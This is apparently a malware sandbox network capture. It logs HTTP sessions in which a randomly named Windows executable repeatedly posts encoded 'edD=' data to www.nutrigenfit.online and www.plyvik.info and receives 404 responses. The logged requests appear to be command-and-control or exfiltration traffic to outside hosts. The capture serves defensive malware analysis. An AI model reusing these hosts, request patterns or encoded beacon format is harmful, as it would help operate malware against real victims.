Data Raw: 65 64 44 3d 32 37 74 56 58 2f 46 51 2f 78 6b 61 6a 5a 44 69 65 6a 43 6a 50 56 39 6a 4d 64 4d 64 49 48 44 6a 30 75 71 52 62 30 2f 42 45 75 64 36 54 4c 6d 34 2b 68 36 2f 4d 49 52 4e 76 67 59 4e 76 6c 4f 6b 59 77 49 6b 62 34 4c 6b 47 4b 57 6b 44 7a 56 68 41 6e 6d 59 75 75 44 34 66 38 45 72 4a 70 42 54 72 37 4b 33 51 6f 62 76 79 57 67 66 6d 41 58 42 63 77 44 70 57 45 42 77 2f 6a 6c 38 6e 58 4b 61 76 4e 4a 62 51 35 50 68 6a 52 75 54 55 74 4e 78 4e 35 34 77 6b 4e 51 61 68 43 75 34 43 6b 4a 64 31 36 58 78 4c 41 31 61 31 46 39 77 4d 2b 4f 53 4a 32 64 2f 70 44 75 48 30 62 30 74 75 43 34 37 52 77 6b 6b 6e 2b 6b 3d
Data Ascii: edD=27tVX/FQ/xkajZDiejCjPV9jMdMdIHDj0uqRb0/BEud6TLm4+h6/MIRNvgYNvlOkYwIkb4LkGKWkDzVhAnmYuuD4f8ErJpBTr7K3QobvyWgfmAXBcwDpWEBw/jl8nXKavNJbQ5PhjRuTUtNxN54wkNQahCu4CkJd16XxLA1a1F9wM+OSJ2d/pDuH0b0tuC47Rwkkn+k=
Oct 29, 2024 16:56:03.415945053 CET | 367 | IN | HTTP/1.1 404 Not Found
Date: Tue, 29 Oct 2024 15:56:03 GMT
Server: Apache
Content-Length: 203
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 79 65 35 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.8 | 49738 | 195.110.124.133 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 16:56:05.139717102 CET | 716 | OUT | POST /uye5/ HTTP/1.1
Host: www.nutrigenfit.online
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.nutrigenfit.online
Referer: http://www.nutrigenfit.online/uye5/
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 224
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Data Raw: 65 64 44 3d 32 37 74 56 58 2f 46 51 2f 78 6b 61 6a 35 7a 69 5a 30 57 6a 4e 31 39 67 4a 64 4d 64 42 6e 44 76 30 75 57 52 62 31 72 52 46 63 70 36 53 70 75 34 39 6a 43 2f 4c 49 52 4e 6b 41 59 49 77 56 4f 72 59 77 4e 48 62 34 48 6b 47 4c 32 6b 44 32 70 68 41 55 4f 62 75 2b 44 36 65 4d 45 70 47 4a 42 54 72 37 4b 33 51 6f 65 41 79 57 6f 66 6d 54 66 42 63 52 44 75 66 6b 42 78 38 6a 6c 38 32 6e 4b 6b 76 4e 49 49 51 34 54 62 6a 53 61 54 55 76 46 78 55 49 34 78 39 64 52 52 2b 53 76 47 4f 45 59 79 7a 37 76 70 4b 6a 64 72 71 6d 51 4c 4a 49 2f 34 54 55 56 35 71 44 47 73 30 59 63 62 72 31 6c 54 4c 54 30 55 35 70 77 66 46 59 6a 4f 6a 67 51 56 61 4f 4f 75 4b 6c 6c 38 46 37 44 75
Data Ascii: edD=27tVX/FQ/xkaj5ziZ0WjN19gJdMdBnDv0uWRb1rRFcp6Spu49jC/LIRNkAYIwVOrYwNHb4HkGL2kD2phAUObu+D6eMEpGJBTr7K3QoeAyWofmTfBcRDufkBx8jl82nKkvNIIQ4TbjSaTUvFxUI4x9dRR+SvGOEYyz7vpKjdrqmQLJI/4TUV5qDGs0Ycbr1lTLT0U5pwfFYjOjgQVaOOuKll8F7Du
Oct 29, 2024 16:56:06.013858080 CET | 367 | IN | HTTP/1.1 404 Not Found
Date: Tue, 29 Oct 2024 15:56:05 GMT
Server: Apache
Content-Length: 203
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 79 65 35 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.8 | 49739 | 195.110.124.133 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 16:56:07.682970047 CET | 1733 | OUT | POST /uye5/ HTTP/1.1
Host: www.nutrigenfit.online
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.nutrigenfit.online
Referer: http://www.nutrigenfit.online/uye5/
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 1240
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Data Raw: 65 64 44 3d 32 37 74 56 58 2f 46 51 2f 78 6b 61 6a 35 7a 69 5a 30 57 6a 4e 31 39 67 4a 64 4d 64 42 6e 44 76 30 75 57 52 62 31 72 52 46 63 78 36 53 61 32 34 2b 45 75 2f 4b 49 52 4e 74 67 59 4a 77 56 4f 4d 59 77 31 62 62 34 37 53 47 50 47 6b 43 55 78 68 43 6c 4f 62 6c 2b 44 36 62 38 45 6f 4a 70 42 47 72 34 79 7a 51 6f 4f 41 79 57 6f 66 6d 53 50 42 56 67 44 75 54 45 42 77 2f 6a 6c 4f 6e 58 4b 66 76 4e 41 59 51 34 57 35 6a 68 43 54 61 76 56 78 50 61 41 78 31 64 52 54 39 53 76 4f 4f 45 55 74 7a 37 44 66 4b 69 70 4e 71 6c 41 4c 4c 66 6d 58 58 55 46 5a 38 43 71 6e 31 4a 46 35 72 45 64 73 4c 43 42 75 38 34 41 39 4c 49 76 34 31 67 4d 65 5a 63 2f 69 5a 78 6c 6d 48 65 71 39 78 62 51 4d 56 4d 35 34 2f 74 6f 44 31 6e 70 4b 59 6b 67 69 42 72 52 42 77 34 73 73 62 74 67 43 67 78 6f 30 6d 32 45 49 4b 6f 43 4b 58 77 33 6b 66 76 7a 39 33 48 41 4d 79 6b 59 6f 4b 68 76 63 63 63 46 6f 42 38 61 4c 67 44 74 2f 58 42 76 47 77 4e 78 71 62 55 54 7a 67 70 49 6b 78 65 6e 37 30 34 69 6e 75 44 72 6f 54 41 56 36 6b 67 51 78 72 61 [TRUNCATED]
Data Ascii: edD=27tVX/FQ/xkaj5ziZ0WjN19gJdMdBnDv0uWRb1rRFcx6Sa24+Eu/KIRNtgYJwVOMYw1bb47SGPGkCUxhClObl+D6b8EoJpBGr4yzQoOAyWofmSPBVgDuTEBw/jlOnXKfvNAYQ4W5jhCTavVxPaAx1dRT9SvOOEUtz7DfKipNqlALLfmXXUFZ8Cqn1JF5rEdsLCBu84A9LIv41gMeZc/iZxlmHeq9xbQMVM54/toD1npKYkgiBrRBw4ssbtgCgxo0m2EIKoCKXw3kfvz93HAMykYoKhvcccFoB8aLgDt/XBvGwNxqbUTzgpIkxen704inuDroTAV6kgQxra3m/x/pOXMTF2s0SEclYvwbFCSvw2Q8M9T6UM34hS2L4P4nM+Rj5hIEMzisUZsAulWulBSiyGyA/vkbmaX7wKHjkpRT6YhzZp+9tFkY1GGGyzTxO9MseAYl0Gb0kgYrLOBzPorinQ9dybSbWZz29jnX6zbUSF8hvdW2ZVEVwlEjdlbiih6sSAywylQGsZYqhg8VMsCFMAp6ykuU6B2WBCTHn75wgEDnVJGqacB/K51o8hXtrxOMQLRQDbGmzArZdzAijsSTFdNf6h6f0bGcHv90jvxUSx0yWYlFQrE2nEaQrC4orRuxI8G/oOWBwNPOhjO5n/I/DsSVJS4UGF2F5O7aB4sXGQmXr8+IVx9Z8F9uj4oShKDliy8tdCGSCslvohtMzk9yW+dOBSPQPQuGtNobHTPf3CoMHtAZ5xg7SBShlhIYPPQPbrRygDy23gqL1zhgPs9DG9UuEcKsq7pWCuNrEMMPXC8OgR18OBgfEx+SQNMpB/nHAOHFLEzywh3zfxIJ78gZKG1SwJ3w6TMjYwq8kBc0D8BRK6jvYT8HVGF33YUHlhRM02GVtpsEixuIZj+EvXNOSxQ/zEFk0BOjLs9ASr0Rb5h1FtEWx6MN07TtUewRhIQt1Rk2hbBZgn/haf0J4iRr9ZbjqbhLbqmb2D9Kq3d30ejeU6vQ [TRUNCATED]
Oct 29, 2024 16:56:08.795032978 CET | 367 | IN | HTTP/1.1 404 Not Found
Date: Tue, 29 Oct 2024 15:56:08 GMT
Server: Apache
Content-Length: 203
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 79 65 35 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>
Oct 29, 2024 16:56:08.796650887 CET | 367 | IN | HTTP/1.1 404 Not Found
Date: Tue, 29 Oct 2024 15:56:08 GMT
Server: Apache
Content-Length: 203
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 79 65 35 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.8 | 49740 | 195.110.124.133 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 16:56:10.230237961 CET | 433 | OUT | GET /uye5/?mRR=Vxudf0fHzLw84n3P&edD=75F1ULhw6FwEjpnDA0ShEFdlFdwdGFO+6cO+diyrF+sYFY6hrAWtaaFZiFMruwmlEHMkL4DDBtvLLE4rNUa6rOrOasIwOIgL2b+vXbiOxUsIxCPoWDvEXykJs0FHlhf94g== HTTP/1.1
Host: www.nutrigenfit.online
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Oct 29, 2024 16:56:11.066350937 CET | 367 | IN | HTTP/1.1 404 Not Found
Date: Tue, 29 Oct 2024 15:56:10 GMT
Server: Apache
Content-Length: 203
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 79 65 35 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                33192.168.2.84974167.223.117.142805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:56:16.476011992 CET675OUTPOST /ak8m/ HTTP/1.1
                                                                                                                                Host: www.plyvik.info
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.plyvik.info
                                                                                                                                Referer: http://www.plyvik.info/ak8m/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 204
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 6d 6c 4e 6a 69 79 6b 7a 46 6a 6b 62 47 4e 2b 52 33 32 69 4a 76 30 44 6b 6b 54 63 55 69 42 7a 34 78 63 45 38 2b 5a 39 67 6b 49 68 56 4a 38 57 34 39 50 62 4d 31 78 32 59 79 54 5a 79 44 65 58 54 54 4a 71 71 6b 2f 35 51 44 4e 4a 62 38 42 2f 6b 38 30 4c 6e 58 56 32 4a 4f 7a 5a 65 53 6b 45 58 45 31 4f 4a 38 74 69 65 34 74 6c 70 41 39 67 73 67 32 46 49 4d 4e 65 46 59 72 79 4f 54 76 7a 58 79 31 55 59 55 4d 34 48 47 39 42 50 69 66 38 2b 70 5a 2f 53 78 6d 46 6c 74 44 7a 4e 57 76 65 78 75 76 74 4f 6b 50 78 2f 58 52 50 63 33 6c 33 59 4d 74 42 4f 49 48 45 46 64 70 78 42 37 36 76 43 69 70 71 5a 48 53 55 3d
                                                                                                                                Data Ascii: edD=mlNjiykzFjkbGN+R32iJv0DkkTcUiBz4xcE8+Z9gkIhVJ8W49PbM1x2YyTZyDeXTTJqqk/5QDNJb8B/k80LnXV2JOzZeSkEXE1OJ8tie4tlpA9gsg2FIMNeFYryOTvzXy1UYUM4HG9BPif8+pZ/SxmFltDzNWvexuvtOkPx/XRPc3l3YMtBOIHEFdpxB76vCipqZHSU=
                                                                                                                                 Oct 29, 2024 16:56:17.162269115 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:17 GMT
                                                                                                                                Server: Apache
                                                                                                                                Content-Length: 389
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                 34 | 192.168.2.8 | 49742 | 67.223.117.142 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                 Oct 29, 2024 16:56:19.059444904 CET | 695 | OUT | POST /ak8m/ HTTP/1.1
                                                                                                                                Host: www.plyvik.info
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.plyvik.info
                                                                                                                                Referer: http://www.plyvik.info/ak8m/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 224
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 6d 6c 4e 6a 69 79 6b 7a 46 6a 6b 62 48 74 4f 52 32 52 2b 4a 6b 30 44 37 68 54 63 55 6f 68 7a 38 78 63 41 38 2b 59 49 39 6b 37 46 56 4b 65 4f 34 2b 4e 2f 4d 32 78 32 59 36 7a 5a 7a 41 75 58 63 54 4a 6d 4d 6b 36 42 51 44 4e 74 62 38 45 62 6b 38 44 6e 67 58 46 32 4c 49 7a 5a 59 4b 45 45 58 45 31 4f 4a 38 73 47 6b 34 75 56 70 41 4e 77 73 6a 54 78 48 53 64 65 47 51 4c 79 4f 45 66 7a 54 79 31 56 4e 55 4e 6b 74 47 37 4e 50 69 66 73 2b 70 6f 2f 52 34 6d 46 5a 6a 6a 7a 59 65 64 50 6d 71 4f 30 76 68 2b 31 4b 66 52 50 32 79 54 47 79 57 50 4a 49 4c 48 73 75 64 71 5a 33 2b 4e 79 71 34 4b 36 70 5a 46 42 6f 4a 52 4d 35 6d 2f 38 6f 6f 63 57 53 2b 73 49 74 34 53 72 4b
                                                                                                                                Data Ascii: edD=mlNjiykzFjkbHtOR2R+Jk0D7hTcUohz8xcA8+YI9k7FVKeO4+N/M2x2Y6zZzAuXcTJmMk6BQDNtb8Ebk8DngXF2LIzZYKEEXE1OJ8sGk4uVpANwsjTxHSdeGQLyOEfzTy1VNUNktG7NPifs+po/R4mFZjjzYedPmqO0vh+1KfRP2yTGyWPJILHsudqZ3+Nyq4K6pZFBoJRM5m/8oocWS+sIt4SrK
                                                                                                                                 Oct 29, 2024 16:56:19.730755091 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:19 GMT
                                                                                                                                Server: Apache
                                                                                                                                Content-Length: 389
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                 35 | 192.168.2.8 | 49743 | 67.223.117.142 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                 Oct 29, 2024 16:56:21.633569956 CET | 1712 | OUT | POST /ak8m/ HTTP/1.1
                                                                                                                                Host: www.plyvik.info
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.plyvik.info
                                                                                                                                Referer: http://www.plyvik.info/ak8m/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 1240
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 6d 6c 4e 6a 69 79 6b 7a 46 6a 6b 62 48 74 4f 52 32 52 2b 4a 6b 30 44 37 68 54 63 55 6f 68 7a 38 78 63 41 38 2b 59 49 39 6b 37 4e 56 4a 72 53 34 38 74 44 4d 33 78 32 59 30 54 5a 75 41 75 58 37 54 49 4f 49 6b 36 64 6d 44 50 6c 62 2b 6e 6a 6b 2b 79 6e 67 5a 46 32 4c 45 54 5a 5a 53 6b 45 34 45 31 65 4e 38 74 32 6b 34 75 56 70 41 4c 30 73 33 57 46 48 51 64 65 46 59 72 79 61 54 76 79 47 79 31 63 36 55 4e 77 58 48 4c 74 50 6a 2f 63 2b 79 36 6e 52 33 6d 46 68 7a 7a 79 64 65 64 43 68 71 50 5a 51 68 2b 41 52 66 54 66 32 32 48 37 6c 43 4d 5a 6f 57 32 55 4a 5a 73 68 2f 79 2f 32 77 6d 37 4b 50 62 47 78 63 4c 45 55 4b 70 2f 41 51 76 2b 72 77 70 4b 68 35 2f 6c 72 48 76 5a 63 53 4c 55 7a 51 58 6b 73 62 50 6c 78 33 7a 31 54 71 63 61 6f 63 62 46 32 69 31 32 70 44 52 76 66 79 58 6e 69 31 36 43 6e 6c 39 55 49 68 6d 64 34 71 6d 62 4c 4c 31 38 6a 70 65 43 61 6e 4d 44 69 48 6e 59 35 67 4b 73 4c 2b 70 73 6a 65 65 6d 62 50 59 6b 4b 4e 68 73 4d 30 46 77 64 42 31 48 67 50 54 52 58 36 78 48 6a 72 43 71 6c 61 64 77 [TRUNCATED]
